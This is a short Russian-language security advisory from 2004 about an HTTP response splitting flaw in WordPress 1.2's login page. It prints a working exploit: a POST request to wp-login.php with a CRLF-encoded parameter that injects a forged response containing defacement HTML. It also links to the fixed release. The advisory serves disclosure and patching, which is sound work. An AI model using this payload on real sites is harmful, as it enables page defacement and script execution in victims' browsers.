HTTP Response Splitting в WordPress

Дата публикации:
12.10.2004
Всего просмотров:
2937
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: WordPress 1.2

Описание: Обнаружена уязвимость при обработке входных данных. Удаленный атакующий может подменить содержание уязвимой страницы и выполнить произвольный сценарий в браузере жертвы.

Эксплоит:

POST /wp-login.php HTTP/1.0
Host: HOSTNAME
Content-Type: application/x-www-form-urlencoded
Content-length: 226

action=login&mode=profile&log=USER&pwd=PASS&text=
%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20
0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:
% 2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>
*defaced*</html>

URL производителя: www.wordpress.org/

Решение:Установите обновление:
wordpress.org/development/2004/10/wp-121/

Ссылки: HTTP Response Splitting in WordPress 1.2

или введите имя

CAPTCHA